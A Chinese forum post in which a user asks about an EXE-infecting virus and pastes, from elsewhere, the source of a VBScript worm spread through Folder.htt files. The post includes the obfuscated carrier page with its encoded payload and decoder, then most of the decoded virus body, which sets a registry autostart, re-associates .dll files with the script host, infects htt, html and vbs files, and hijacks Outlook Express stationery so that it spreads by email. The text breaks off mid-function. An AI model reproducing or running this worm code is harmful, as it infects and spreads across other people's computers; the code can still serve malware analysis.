中了一个不知道什么病毒,只是感染最后一个盘的exe文件.,,感染是方式就是和威金一样,,图标变了,如果想强行运行那exe文件就会自动生成原来的文件,,就是说,有2个一样的exe文件会出现,就等于是生成了一个副本一样.一个是没有感染之前的状态图标,一个是感染之后的状态图标,,.我用方格子gtx安全专家查杀的时候,,,里面有威金的病毒特征...可还是杀不死,,这病毒,,,只是会感染最后一个盘的exe文件,,和威金感染的特征一样，都是感染10M以下的EXE文件,,,我试过很多杀软都不行(包含卡巴,也),专杀的也不行,,也是杀不出什么,,图标还是一样,,,我在网上找了些资料看,,,是这样描述的,不知道是不是这个....

一种简单的利用htt文件传播的vbs脚本病毒


<BODY  onload="vbscript:KJ_start()"> 
  <!-- 
    *  Copyright  1999  Microsoft  Corporation.    All  rights  reserved. 
    --> 
   
  <html> 
          <head> 
                  <meta  http-equiv="content-type"  content="text/html;  charset=UTF-8"> 
          </head> 
          <style> 
                  body                {margin:  0;  font:  menu;  color:  black} 
                  #Panel            {position:  absolute;  width:  200px;  height:  100%;  visibility:  hidden;  overflow:  auto} 
                  #Corner          {padding-left:  12px;  padding-top:  11px} 
                  #FolderIcon  {width:  32px;  height:  32px} 
                  #FolderName  {margin-top:  8px;  font:  14pt/14pt  menu;  font-weight:  bold} 
                  #LogoLine      {width:  100%;  height:  2px;  margin-top:  4px;  vertical-align:  top} 
                  #Details        {padding-left:  12px;  margin-top:  8px} 
                  #Locked          {vertical-align:  baseline} 
                  .Divider        {width:  100%;  color:  #C0C0C0;  height:  1px} 
                  #Thumbnail    {width:  120px;  height:  120px} 
                  .Legend          {margin-left:  8px} 
                  #Brand            {position:  absolute;  left:  200px;  width:  100%;  height:  100%;  padding-left:  12px} 
                  p                      {margin-top:  12px} 
                  p.Half            {margin-top:  4px} 
                  button            {font:  9pt  宋体,  MS  Song;  margin-left:  12px;  background:  white;  color:  black} 
                  .Message        {width:  100%;  frameBorder:  0;  background:  infobackground;  color:  infotext;  border:  1px  solid  lightgrey} 
                  #CSCPlusMin  {width:  17px} 
                  #CSCText        {} 
                  #CSCDetail    {} 
                  #CSCButton    {} 
   
                  #FileList      {position:absolute;  width:0;  height:100%;  border=0} 
          </style> 
          <body  scroll=no> 
                  <div  id=Panel  style="background:  white  URL(wvleft.bmp)  no-repeat"> 
                          <div  id=Corner> 
                                  <object  id=FolderIcon  classid="clsid:844F4806-E8A8-11d2-9652-00C04FC30871"  tabIndex=-1> 
                                          <param  name="scale"  value=100> 
                                  </object> 
                                  <br> 
                                  <div  id=FolderName> 
                                          %THISDIRNAME% 
                                  </div> 
                          </div> 
                          <img  id=LogoLine  src="wvline.gif"> 
                          <div  id=Details> 
                                  <span  id=CSC> 
                                          <div  tabIndex=2  id=CSCHotTrack> 
                                          <span  id=CSCPlusMin> 
                                          </span> 
                                          <span  id=CSCText> 
                                          </span> 
                                          </div> 
                                          <div  id=CSCDetail> 
                                          </div> 
                                          <span  id=CSCButton> 
                                          </span> 
                                          <hr  CLASS=Divider  NOSHADE> 
                                  </span> 
                                  <span  id=Info> 
                                  </span> 
   
                                  <br> 
                                  <span  id=MediaPlayerSpan> 
                                  </span> 
   
                                  <object  id=Thumbnail  classid="clsid:71650000-E8A8-11d2-9652-00C04FC30871"  tabIndex=-1> 
                                  </object> 
                                  <label  id=ThumbnailLabel  for="Thumbnail"  style="display:  none"> 
                                  </label> 
   
                                  <span  id=Links> 
                                  </span> 
                          </div> 
                  </div> 
                  <object  id=FileList  classid="clsid:1820FED0-473E-11D0-A96C-00C04FD705A2"  tabIndex=1> 
                  </object> 
                  <object  id=WVCoord  classid="clsid:BCFD624E-705A-11d2-A2AF-00C04FC30871"> 
                  </object> 
          </body> 
  </html>

<script  language=vbscript> 
  document.write  "<div  style='position:absolute;  left:0px;  top:0px;  width:0px;  height:0px;  z-index:28;  visibility:  hidden'><"&"APPLET  NAME=KJ"&"_guest  HEIGHT=0  WIDTH=0  code=com.ms."&"activeX.Active"&"XComponent></APPLET></div>" 
  </script> 
  <script  language=vbscript> 
  ExeString  =  ">flCkV`_od$BqldNbwl&SakNbwl&Ad_lbdKcdm$;mod_Lab_`s$@PN$QpR`_ik$QfmH[qg$Mra=&Chf[ix<cpjPtZHIWmq`jn%(HIK_qCag%(HI;lb`l_Jhdcbt  #CDIhc_Fs  #CD@q][qdE[fk  #CDMqgj^fYnb'!Df^Rm\Ctf]qhghJB;mo]haSgChd_M`lb)SqjbRll&Ik=lonjOdkojdHbwlR]nQ][aS]gm5CRG(Lo]hQdpnChd_%EafbOYne+)#LgmRll<Lb`\Nblh(OdY^>kdH^Fmkno'LgmRll)!CD\rl[os  #(6;(LqFbm  NjoKno(60NedfQ][aS]gm-;flr]Dpcq>okblclmBm\FeFeNvo]Mqq7!`nq!NedfQ][aS]gm-;flr]R]nEafbS]gm5CRG(Lo]hQdpnChd_%EafbOYne+*#>cidL_jo&Qohl_!4%?N<Snffl`\7!#p_r[lfol4JBYpsYlq'!!  !6%p_BjFcQlhMqq  uZ=oK^#@njkL_usChd_Qdej+BdipdPdlC@lnohZ:>ML-?_qEafb'>cidH[qg!E9nqqa\+`lnohZoqdk:+.=fpdOdY^Qdej+BdipdPdlChd_Qdej<@PN&ImdfNbwl@fk]Chd_M`lb)7!H^Qxh_Psj:bqldS`_k@fk]Nblh(Tqanbn\@qD`%9!  !@NJK6%p_BjFc;#<LCQlmdi^c5!  !n\pbjcms2%HIWmq`jn%(=#n\@qD`%BqldNbwlDdmbH^Qxh_Psj:p_rQg]h>cidL_jo&Qohl_uZ=oK^#N\pS]rq?kcCc@fk]Nblh(@kgmb?kcCc?kc@rm[nfnf@rm[nfnfHI;b^m__PtZ@tjlbmlMqqahd+D[psAhadp=e`j#A`KYmqHf^bw;b^q7/NedfH^Id^n%K;[pd  =rqj_ksKnohfa&+)#<4IBYmb'](NedfJB=e`fabRm\<@fmYfvCamh9TKo_D7/Bkk_CD@gYhddKo_5@gj>r[Id^n%K;[pd  =rqj_ksKnohfa&+)#&%.(  !2VMra=:(Df^H^DdmbEGB`[kf]Mra7La^%BmlodfnPsjckf$+)KYmqHf^bw;b^q!Df^H^Df^Emh`saikEmh`saikCD@q][qdE[fk  #GhDjllqLbrmgbF_usFeCkV`_od7!`njkQg]h=rfs@rm[nfnfDf^H^R`[od>cid7K]`q'OckOYne++#%Mqgao`eChd_p[;ijlghEafbrTGfbjipn^nR`[od\VPsYnfnf_oxT\i`fe+glgCc  @PN&@fk]?uhknp'Kb^q]@fk]#&Lbbm@`dfJB;mo]haSgPgYlbEafb+bqld&?ir]R]nEafbS]gm5CRG(Lo]hQdpnChd_%R`[od>cid$,)sjob(Chd_Qdej+Vjcqd9!  !@NJK6%p_BjFc;#<LCQlmdi^c5!  !n\pbjcms2%HIWmq`jn%(=#n\@qD`%BqldNbwlEafbS]gm-;flr]Df^H^C]`^tdnFc7VkMeddf+Q]aOdY^%!@EBXW=RQJ?KSWOPDJVFc]hqhlcbrT>beYoisOpdjFC#GoqKgihU]lphgh<QpR`_ik&LbfJ_^c  EJ=S\KG=>KWG>B@CKDTMlelq^q]VJh[llrg`q[Goqkgih=rmq]mp[E_ahYPbq#OmPg]fi-J_dVjcqdEJ=S\BMLODFN\TK?O[A^bmlcqh]mY!>beYoisA^#!TMlelq^q]VJh[llrg`q[Goqkgih=rmq]mp[  K]`q'GoqKgihU]lphgh)0!#!&*YLYci[;ijogmbMmbKn^saikdjs+)&Q=A\COIOCBYfiCDJ`afOd_GC?V^;OOQ=HQ^MMBQTCadfnfsa_p[  Ad^[rklCa%VPn^nt`j_YLa]onkicsTIrsdilj?uoj_prT#D_cs  IrsDiljN_oraik+)#%(-[E[fkTMq`lclm]lvF[jd&PgYlbEafb(@`dfJBG^hdLbf  EJ=S\BMLODFN\TK?O[A^bmlcqh]mY!>beYoisA^#!TMlelq^q]VJh[llrg`q[Goqkgih=rmq]mp[  K]`q'GoqKgihU]lphgh)0!#!&*YLYci[OcadMq`lclm]lvF[jd&PgYlbEafb(TrKbbkd(Od_Qohl_!@EBXW=RQJ?KSWOPDJVPn^nt`j_YLa]onkicsTIcea]b[1(-[Goqkgih[Gjqhghp[E[fkT?ahlioOj_cdj_kb])0++-6*&Q=A\COIOCBYfiCDJ`afOd_GC?V^;OOQ=HQ^MMBQTMlelq^q]VJh[llrg`q[OckcgqpE_prYafm_PtZmvrl_j[HlleafbrTGfbjipn^nNmningeHfnbqf_qK_qsahdrT*^/\*//(*-/(*-/(]-/(*-/(*-/(*-3.V-/)_-2.*+\i`fe(@`dfJBG^hdLbf  EJ=S\BMLODFN\TK?O[Kicso[odTGfbjipn^nYVahanomMLV@tjlbmlPbqkclmTQfm\itrGbrk[dhfaRm\pxknblTJon^cidkVJh[llrg`qGoqkgihAhqdjhbsMbslckfkV-`(^-1(*-/(*-/(*`/(*-/(*-/(*-/,0Y/(+b/+0-!$_kYhh!!VkMeddf+Q]aTqanbBHDQY@TJLBMLYRR=LYRg`qvYlb[Ec`qgmlelVLe^c`dT+--(VLtlflncVLolclmkVJ`afYD\cqnjJod^_odf]b!$+00(1/+LBFW>TNJ>=^kdHIE[fkJ_d'BHDQY@TJLBMLYRR=LYRg`qvYlb[Ec`qgmlelVLe^c`dT+--(V@neglmTG^hdMbslckfkVKdoMq`lclm]lv!$_kYhh!!JBojlYabEgfadjId^n%VahM`lb)2!#Jon_l^l@fk]mYBggjnfChd_p[Ec`qgmlelPgYlbcTMq`lclm]lv!!Df^Emh`saikEmh`saikCD@q][qdEcih]o%(Lm?oqglQ]mrl]KdpnL_joH[qg7!H^KnlCRG(Chd_Bwamqr  QfmH[qg  !OM`qajq-]rb!!#S`_kNblhJ^s`:mvrl_j2*V?kcCcCcL_joH[qg7!ksps]g01TS`_kMq`jnRo>cid7VahM`lb%PXKNBLTEbqf_i2*(akd=fpdPsYlqTh@fk]:OckOYneRQMQDEVHdjhbk&^ikDf^H^VkMeddf+Q]aTqanbBHDQYIN;;I^E;@GAHB[Kicso[odTGfbjipn^nYVahanomYBmlodfnSdjmfnfVOtfVHdjhbk+,+Kn^qlOmEafb@PN&=loq@fk]ThfJ^s`#qbaTegvYfi-_cc!$QfmH[qg  !o__[>iic]l+gln@PN&=loq@fk]ThfJ^s`#mvrl_j2*Vhio[ik&afe&ThfJ^s`#mvrl_j2*Vadkeqnh(fma;[ikEG@hjbm\Nl'OckOYnev]\YEgfadj(esl)!`nq!!VkMeddf+Q]

aTqanbBHDQY@K9MPDKYONGNY-\fi[&cdfchd_QpR`_ik&LbfOlfs]GC?V^;F>RK?P^JILST(akdV@nfnbmlQxh_+[modc``lclm'r*lk^lvffl`\OmPg]fi-J_dVjcqdEJ=S\BD;PR=M\QGIQ[\fieafb[<_c`mfqH[ik[&TrKbbkd(Od_Lb`\GC?V^;F>RK?P^JILSTpuc^cidT>beYoisA]lmT&QpR`_ik&LbfOlfs]GC?V^;F>RK?P^JILST^ik^cidTM`qajqDfafm]V+P?R[lfolOmPg]fi-J_dVjcqdEJ=S\BD;PR=M\QGIQ[\fiEafb[KbbkdVLo]hYBggj`f^Y!$QfmH[qg  S]gmOYneVK]ohhn+dp_!.!)VkMeddf+Q]aTqanbBHDQY@K9MPDKYONGNYcdfChd_YR`_ik=rYOjimdjnvR`_bs@[kcd_orTQPGHllokV+u3/*/1B9/*8--?,)+@E%2@8.'-/9;-/:24/0=z!TrKbbkd(Od_Qohl_!@EBXW=I@KMBRWLLNLVakd@fk]VPbjcms@ips=h`n\_Y!$x7-+00.-.,,2-B%+.C*'?0>3*/(=-3>23B+,1|R]nEafbS]gm5CRG(Lo]hQdpnChd_%Rl[osMjChd_)1$not]#>cidL_jo&Qohl_UZmQdpn>cidL_jo&=ink_=ha>okblclm>okblclmEGKaebHl&CcAhTg]lb48!`njkQg]h=rfs@rm[nfnfDf^H^S`cpKg]^saik5an[ojdfn+kg]^saikCcD_cs  NehkFlbYnfnf&3!:`fk]S`_kNehkFlbYnfnf:Eca'LbfrDi``lclm$3&Cc>ML-?_qDpnbmkclmF[jd  NehkFlbYnfnf#;6!nedfS`cpKg]^saik5Id^n%S`cpKg]^saik+D_k'LbfrDi``lclm!*D_k'>ML-?_qEafbMYgb'LbfrDi``lclm!#&?kcCcCcD_k'LbfrDi``lclm!;+Qg]hLbfrDi``lclm7S`cpKg]^saik[Df^H^JBojlYabEgfadjQgamIn[[qhgh&?kcCc?kc@rm[nfnf@rm[nfnfHIE[fkJ_d'J_dRll)EafbMYgb(Lm?oqglQ]mrl]KdpnJ_dS]gmRll<QpR`_ik&LbfJ_^c  LbfKno(FeLbfL_joKno5!NedfVkMeddf+Q]aTqanbJ_dRll)EafbMYgb?kcCc?kc@rm[nfnf@rm[nfnfHIG\lRm\%BmlodfnPsjckf!Rm\B5-NbrlIrs7/AnQehd_SjobNbrlIrs7S]mqNmn*+A`S]mqNmn=,5Lbbm@tjlbmlMqqahd5Chf[ix<cpj  !2V?uhlAnBm\FeLm?oqglQ]mrl]KdpnK_qLbfr>iic]l<@PN&Abs>iic]l%BmlodfnPsjckf!R]nCa]PtZ:;lb`l_Lab_`s  Pbjcmsahd-<c`saik`js(PdlCnd^bqk:Lbfr>iic]l+Rm\Cnd^bqkEgfadj=ltfn<*>io=[`gNblh@lk\_oahEgfadjm>iic]l@nmhq5Cnd^bq;irml()Ca]PtZ(^c\Cnd^bq;irml&S]gmEgfadj(K`e_F_usFe>fbKo_-;irml:(Qg]hD[psAhadp=e`j:AhpsjLbu  =rqj_ksKnohfa)!T)K]h%BmlodfnPsjckf!'.(PtZMqqahd5Jh\@tjlbmlMqqahd+D[psAhadp=e`j%.+D_k';ooq]hqRllfm_#*KYmqHf^bw;b^q%+&=rqj_ksKnohfa<EGB`[kf]Mra  =rqj_ksKnohfa)KYmqHf^bw;b^q!Rm\B5.?ir]H^PtZ?<*S`_k=rqj_ksKnohfa<=rqj_ksKnohfa%>fbKo_-Anbl  +&[Dpcq<i=fpdg5-@lqd<+SgCnd^bq;irmlH^IBYmb'Ko_Rllfm_#<F@`k_%Ca]PtZ(Fs]g%i!#S`_kCcb9>iic]l@nmhqLbbm@tjlbmlMqqahd5@tjlbmlMqqahdAh[Mra&Cqdeg*)#%Y!BwanCgDf^H^Df^H^M]rqF^rlCkc]r@gYl<CkrllOdn@tjlbmlMqqahd+V+D_k';ooq]hqRllfm_#*0!Rm\Psjckf7La^%BmlodfnPsjckf$F^rlCkc]r@gYl(0$Fbm  =rqj_ksKnohfa&,D[psAhadp=e`j'.(@tjlbmlMqqahd5HI;b^m__PtZ@tjlbmlMqqahd+D[psAhadp=e`j#=haA`=haA`DiloHIG\lRm\<=rqj_ksKnohfa=ha>okblclm>okblclmEGOjim`_[qd  #GhDjllqLbrmgbF_usOd_J^s`P^km_<EJ=S\KG=>KWG>B@CKDTMlelq^q]VJh[llrg`q[Goqkgih=rmq]mp[<_dq]_>frc>bfj_b5TrKbbkd(Od_Lb`\Od_J^s`P^km_&Cc<cpj<_dq]_<LbbmAhkeAd_lbd7Eah^kq>frc#4Y!Bm\FeCnjf<)qn/<cpj<_dq]_<EGNZiPtZAhkeAd_lbd!JBojlYabEgfadjAhkeAd_lbd!M]rqQpR`_ik&LbfOlfs]Od_J^s`P^km_)CamhC]aod]Df^Emh`saikEmh`saikCDrle[dd>iic]l%OYneMYgb(Lm?oqglQ]mrl]KdpnK_q>iic]lK`e_<@PN&Abs>iic]l%OYneMYgb(PdlQgamChd_p5Cnd^bqF[jd&@fk]m@nqDpcpsk:(EglDY]eLbfr>cidCkLbfr>cidkEafbDpn<O@`k_%EKI+F]nBwl_kraikMYgb'Lbfr>cid&J^s`#&Cc>cid=rq5GLGGlEafbDpn<ESEFGlEafbDpn<>RHNjChd_Bwl:JEOLq@fk]?us7!BMM!NedfBYfiCD>oh_kcLi%S`cpEafb-H[qg$esef(Bkk_Fe@fk]?us7!N<P!NedfBYfiCD>oh_kcLi%S`cpEafb-H[qg$sak&?ir]Cc>cid=rq5GLNLbbmEsl?uhknp5.?kcCcHbwlH^%T;[pd  J^s`H^l]#<O@`k_%VahM`lb%AdkeqnhV(!LqRBYmb'H[qgF[jd!:M=^r]ThfJ^s`#>brcnlo#&S`_kBqs=rfrlm<+=haA`A`GlnBwamqr7/NedfEKI+BgjvEafbOckOYnerqmqde-/[\_pjlim-ahf!$J^s`H^l]EKI+BgjvEafbOckOYnev]\YEgfadj(esl)OYneMYgb?kcCc?kc@rm[nfnf@rm[nfnfHIK_qCag%(Lm?oqglQ]mrl]Kdpn=lo-;fb`jS]mqHl:OM`qajq-K]ohhnCtdfk`e_A`DjlS`_kCkV`_od7!`njkDdmbCkV`_od7!n\p!Bm\FeFeCkV`_od7!n\p!NedfR]nEKI<=odYnbNZdbblR[lfolckf&@fk]Mvrl_jNZdbbl&MbsQpR`_ik7Bj_^s]I_i]]q'QPbjcms&Meddf(Bkk_K_q9jmk]I_i]]q5an[ojdfn+`hjidlm%!CD\fm_ps#9jmk]I_i]]q-k_qBDMFC  xE1-2C;,/,)=C/%+.C('>C:3*/(=-3>>279*?|#9jmk]I_i]]q-[lb`l_Fmkn^m[_%(PdlTrKbbkd:9jmk]I_i]]q-?_qNZdbbl&;mod_Lab_`s&mbs;FPH<z(>12>?-0%@-8+'.0;@*71.-,(*>/;3-4,,/7u&;mod_Lab_`s&]odYnbHfmq`f]b'!R]nEKI<;mod_Lab_`s&AbsG\gd[n%(Bm\FePdlAhkeLab_`s7EKI+CjcsdkEglDY]e<cpjL_joCk<cpjG\gd[nA`CamhS]gm-<lfu]Nvo]9=,@f^CamhS]gm-<lfu]Nvo]9=+S`_k?uhlCnjDf^H^Eah^kq>frc:<cpjL_jo&>ohn_IdlnbqKdpn<cjGnedj;oq  -&L^m\ijhr_>ioa7-Li2Ls`_o@jl%h!:Ahq'  3)Lkc!#F_usQdejPsjckf7!Eglh5+SgIdfQgamQdpn&NblhHrl7@k]%La^%S`cpS]rq+a&.(!H^QdejKte:)-S`_kNblhHrl710DdmbH^QdejKte:)*S`_kNblhHrl711Df^H^S]gmB`[o5@gjQdejKte*Gnedj;oq  cLg^3!#A`S]gmB`[o5@gj03!Qg]hL_jo;b^q7B`l%00#=haA`L_joKnohfa<NblhMqqahdQdej@gYlF_usRmDi`jKno5Dp_`tl_%!>flEbx9lo'+#)S`cpS]rq!  sa;lIeJ]s>qj-(7!  Nlbbq9lo'(#%!p_BjFc%Hdq;oq  +&5Ls`_o@jl%0!#%n\@qD`#!Ebx9lo'*#<%Iqg]l>qj/(  !#uZ=oK^  !C_v@jl%2!:#Gnedj;oq  -&!  sa;lIeEglh5+SgIdfBw]Mqqahd(#uZ=oK^  !L_joFoj5>r[Jh\Bw]Mqqahd+a&.(!%n\@qD`#!CcL_joFoj5.7Nedf%n\@qD`#!NblhHrl72,%n\@qD`#!?kcCc!  sa;lIeS]gmB`[o5@gjQdejKte(C_v@jl%hGlc.&(#uZ=oK^  !A`S]gmB`[o5@gj/7!Qg]h!p_BjFc%Qdej@gYl<p_Bj%n\@qD`#!?ir]CcL_jo;b^q7B`l%11#S`_k!  sa;lIeS]gmB`[o5saD`!p_BjFc%Bm\Fe#uZ=oK^  !LbfrL_us7S`cpS]rqQdej@gYl!p_BjFc%Kdpn!!%p_BjFcDp_`tl_%S`cpS]rq(S`cpS]rq5Dp_Psjckf7!%NblhMqqahd!@njkL_us7;#m`qajqd[kfm[dd5p_r[lfol8sa;lIe  !\i`te_ks&qohl_!  !;#^fumqxd_:&hiphlclm2[_rgfrs]5k]`q9(ju:nlo2*mw3th\ne9(ju:bbh_bq9(ju:t*hf^bw2,5:pfra\fkanv9bfc\_k&6%9!  !#;MOD?QF;JD5EG!  !WardknG=CDGL7-OCAS@7-[iad5]ll&gp-#![`sapbW&;`sapb!  !P=llhikdfn;!  !4%,@HJIDL8;#)ahn8!#n\@qD`%9!  !'m`qajq=#n\@qD`%9!  !k]ohhnkYhdtYab<n\pbjcms6%p_BjFcQgamQdpn%p_BjFcRmDi`jKnosa;lIe  !4%,r[lfol8sa;lIe  !4%,AG>V=#n\@qD`%9!  !'BQLD8P_rL_us7S`cpS]rqsa;lIe  TfFlbcMqq  uZ=oK^#EG^kn^ql&!ThfJ^s`:>ML-?_qRh_`hYfCnd^bq  *&[H^%EKI+EafbDpcpskThfJ^s`#qbaT@lk\_o-`nq!!#S`_k@PN&=loq@fk]ThfJ^s`#qbaT@lk\_o-`nq!$QfmH[qg  !o__[cdt`df+fa`?kcCcCc  @PN&@fk]?uhknp'OckOYnerqmqde-/[\_pjlim-ahf!!#S`_k@PN&=loq@fk]ThfJ^s`#mvrl_j2*Vadkeqnh(fma)VahM`lb%pxknbl+,Yjbq^kd(dh^=haA`=ha>okblclm" 
  Execute("Dim  KeyArr(3),ThisText"&vbCrLf&"KeyArr(0)  =  8"&vbCrLf&"KeyArr(1)  =  6"&vbCrLf&"KeyArr(2)  =  3"&vbCrLf&"KeyArr(3)  =  1"&vbCrLf&"For  i=1  To  Len(ExeString)"&vbCrLf&"TempNum  =  Asc(Mid(ExeString,i,1))"&vbCrLf&"If  TempNum  =  18  Then"&vbCrLf&"TempNum  =  34"&vbCrLf&"End  If"&vbCrLf&"TempChar  =  Chr(TempNum  +  KeyArr(i  Mod  4))"&vbCrLf&"If  TempChar  =  Chr(28)  Then"&vbCrLf&"TempChar  =  vbCr"&vbCrLf&"ElseIf  TempChar  =  Chr(29)  Then"&vbCrLf&"TempChar  =  vbLf"&vbCrLf&"End  If"&vbCrLf&"ThisText  =  ThisText  &  TempChar"&vbCrLf&"Next") 
  Execute(ThisText) 
  </script> 
  </BODY> 
  </HTML>

病毒解码函数. 
  Dim  KeyArr(3),ThisText 
  KeyArr(0)  =  8 
  KeyArr(1)  =  6 
  KeyArr(2)  =  3 
  KeyArr(3)  =  1 
  For  i=1  To  Len(ExeString) 
  TempNum  =  Asc(Mid(ExeString,i,1)) 
  If  TempNum  =  18  Then 
  TempNum  =  34 
  End  If 
  TempChar  =  Chr(TempNum  +  KeyArr(i  Mod  4)) 
  If  TempChar  =  Chr(28)  Then 
  TempChar  =  vbCr 
  ElseIf  TempChar  =  Chr(29)  Then 
  TempChar  =  vbLf 
  End  If 
  ThisText  =  ThisText  &  TempChar 
  Next





解码后的病毒体. 
  Dim  InWhere,HtmlText,VbsText,DegreeSign,AppleObject,FSO,WsShell,WinPath,SubE,FinalyDisk 
  病毒主函数 
  Sub  KJ_start() 
  KJSetDim() 
  KJCreateMilieu() 
  KJLikeIt() 
  KJCreateMail() 
  KJPropagate() 
  End  Sub

Function  KJAppendTo(FilePath,TypeStr) 
  On  Error  Resume  Next 
  Set  ReadTemp  =  FSO.OpenTextFile(FilePath,1) 
  TmpStr  =  ReadTemp.ReadAll 
  If  Instr(TmpStr,"KJ_start()")  <>  0  Or  Len(TmpStr)  <  1  Then 
  ReadTemp.Close 
  Exit  Function 
  End  If 
  If  TypeStr  =  "htt"  Then 
  ReadTemp.Close 
  Set  FileTemp  =  FSO.OpenTextFile(FilePath,2) 
  FileTemp.Write  "<"  &  "BODY  onload="""  &  "vbscript:"  &  "KJ_start()"""  &  ">"  &  vbCrLf  &  TmpStr  &  vbCrLf  &  HtmlText 
  FileTemp.Close 
  Set  FAttrib  =  FSO.GetFile(FilePath) 
  FAttrib.attributes  =  34 
  Else 
  ReadTemp.Close 
  Set  FileTemp  =  FSO.OpenTextFile(FilePath,8) 
  If  TypeStr  =  "html"  Then 
  FileTemp.Write  vbCrLf  &  "<"  &  "HTML>"  &  vbCrLf  &  "<"  &  "BODY  onload="""  &  "vbscript:"  &  "KJ_start()"""  &  ">"  &  vbCrLf  &  HtmlText 
  ElseIf  TypeStr  =  "vbs"  Then 
  FileTemp.Write  vbCrLf  &  VbsText 
  End  If 
  FileTemp.Close 
  End  If 
  End  Function 
   
  Function  KJChangeSub(CurrentString,LastIndexChar) 
  If  LastIndexChar  =  0  Then 
  If  Left(LCase(CurrentString),1)  =<  LCase("c")  Then 
  KJChangeSub  =  FinalyDisk  &  ":\" 
  SubE  =  0 
  Else 
  KJChangeSub  =  Chr(Asc(Left(LCase(CurrentString),1))  -  1)  &  ":\" 
  SubE  =  0 
  End  If 
  Else 
  KJChangeSub  =  Mid(CurrentString,1,LastIndexChar) 
  End  If 
  End  Function 
   
  Function  KJCreateMail() 
  On  Error  Resume  Next 
  If  InWhere  =  "html"  Then 
  Exit  Function 
  End  If 
  ShareFile  =  Left(WinPath,3)  &  "Program  Files\Common  Files\Microsoft  Shared\Stationery\blank.htm" 
  If  (FSO.FileExists(ShareFile))  Then 
  Call  KJAppendTo(ShareFile,"html") 
  Else 
  Set  FileTemp  =  FSO.OpenTextFile(ShareFile,2,true) 
  FileTemp.Write  "<"  &  "HTML>"  &  vbCrLf  &  "<"  &  "BODY  onload="""  &  "vbscript:"  &  "KJ_start()"""  &  ">"  &  vbCrLf  &  HtmlText 
  FileTemp.Close 
  End  If 
  DefaultId  =  WsShell.RegRead("HKEY_CURRENT_USER\Identities\Default  User  ID") 
  OutLookVersion  =  WsShell.RegRead("HKEY_LOCAL_MACHINE\Software\Microsoft\Outlook  Express\MediaVer") 
  WsShell.RegWrite  "HKEY_CURRENT_USER\Identities\"&DefaultId&"\Software\Microsoft\Outlook  Express\"&  Left(OutLookVersion,1)  &".0\Mail\Compose  Use  Stationery",1,"REG_DWORD" 
  Call  KJMailReg("HKEY_CURRENT_USER\Identities\"&DefaultId&"\Software\Microsoft\Outlook  Express\"&  Left(OutLookVersion,1)  &".0\Mail\Stationery  Name",ShareFile) 
  Call  KJMailReg("HKEY_CURRENT_USER\Identities\"&DefaultId&"\Software\Microsoft\Outlook  Express\"&  Left(OutLookVersion,1)  &".0\Mail\Wide  Stationery  Name",ShareFile) 
  WsShell.RegWrite  "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Outlook\Options\Mail\EditorPreference",131072,"REG_DWORD" 
  Call  KJMailReg("HKEY_CURRENT_USER\Software\Microsoft\Windows  Messaging  Subsystem\Profiles\Microsoft  Outlook  Internet  Settings\0a0d020000000000c000000000000046\001e0360","blank") 
  Call  KJMailReg("HKEY_CURRENT_USER\Software\Microsoft\Windows  NT\CurrentVersion\Windows  Messaging  Subsystem\Profiles\Microsoft  Outlook  Internet  Settings\0a0d020000000000c000000000000046\001e0360","blank") 
  WsShell.RegWrite  "HKEY_CURRENT_USER\Software\Microsoft\Office\10.0\Outlook\Options\Mail\EditorPreference",131072,"REG_DWORD" 
  Call  KJMailReg("HKEY_CURRENT_USER\Software\Microsoft\Office\10.0\Common\MailSettings\NewStationery","blank") 
  KJummageFolder(Left(WinPath,3)  &  "Program  Files\Common  Files\Microsoft  Shared\Stationery") 
  End  Function

Function  KJCreateMilieu() 
  On  Error  Resume  Next 
  TempPath  =  "" 
  If  Not(FSO.FileExists(WinPath  &  "WScript.exe"))  Then 
  TempPath  =  "system32\" 
  End  If 
  If  TempPath  =  "system32\"  Then 
  StartUpFile  =  WinPath  &  "SYSTEM\Kernel32.dll" 
  Else 
  StartUpFile  =  WinPath  &  "SYSTEM\Kernel.dll" 
  End  If 
  WsShell.RegWrite  "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\Kernel32",StartUpFile 
  FSO.CopyFile  WinPath  &  "web\kjwall.gif",WinPath  &  "web\Folder.htt" 
  FSO.CopyFile  WinPath  &  "system32\kjwall.gif",WinPath  &  "system32\desktop.ini" 
  Call  KJAppendTo(WinPath  &  "web\Folder.htt","htt") 
  WsShell.RegWrite  "HKEY_CLASSES_ROOT\.dll\","dllfile" 
  WsShell.RegWrite  "HKEY_CLASSES_ROOT\.dll\Content  Type","application/x-msdownload" 
  WsShell.RegWrite  "HKEY_CLASSES_ROOT\dllfile\DefaultIcon\",WsShell.RegRead("HKEY_CLASSES_ROOT\vxdfile\DefaultIcon\") 
  WsShell.RegWrite  "HKEY_CLASSES_ROOT\dllfile\ScriptEngine\","VBScript" 
  WsShell.RegWrite  "HKEY_CLASSES_ROOT\dllFile\Shell\Open\Command\",WinPath  &  TempPath  &  "WScript.exe  ""%1""  %*" 
  WsShell.RegWrite  "HKEY_CLASSES_ROOT\dllFile\ShellEx\PropertySheetHandlers\WSHProps\","{60254CA5-953B-11CF-8C96-00AA00B8708C}" 
  WsShell.RegWrite  "HKEY_CLASSES_ROOT\dllFile\ScriptHostEncode\","{85131631-480C-11D2-B1F9-00C04F86C324}" 
  Set  FileTemp  =  FSO.OpenTextFile(StartUpFile,2,true) 
  FileTemp.Write  VbsText 
  FileTemp.Close 
  End  Function 
   
  Function  KJLikeIt() 
  If  InWhere  <>  "html"  Then 
  Exit  Function 
  End  If 
  ThisLocation   =  document.location  
  If  Left(ThisLocation,  4)  =  "file"  Then 
  ThisLocation   =  Mid(ThisLocation,9) 
  If  FSO.GetExtensionName(ThisLocation)  <>  ""  then 
  ThisLocation   =  Left(ThisLocation,Len(ThisLocation)  -  Len(FSO.GetFileName(ThisLocation))) 
  End  If 
  If  Len(ThisLocation)  >  3  Then 
  ThisLocation   =  ThisLocation   &  "\" 
  End  If 
  KJummageFolder(ThisLocation) 
  End  If 
  End  Function 
   
  Function  KJMailReg(RegStr,FileName) 
  On  Error  Resume  Next 
  RegTempStr  =  WsShell.RegRead(RegStr) 
  If  RegTempStr  =  ""  Then 
  WsShell.RegWrite  RegStr,FileName 
  End  If 
  End  Function 
   
  Function  KJOboSub(CurrentString) 
  SubE  =  0 
  TestOut  =  0 
  Do  While  True 
  TestOut  =  TestOut  +  1 
  If  TestOut  >  28  Then 
  CurrentString  =  FinalyDisk  &  ":\" 
  Exit  Do 
  End  If 
  On  Error  Resume  Next 
  Set  ThisFolder  =  FSO.GetFolder(CurrentString) 
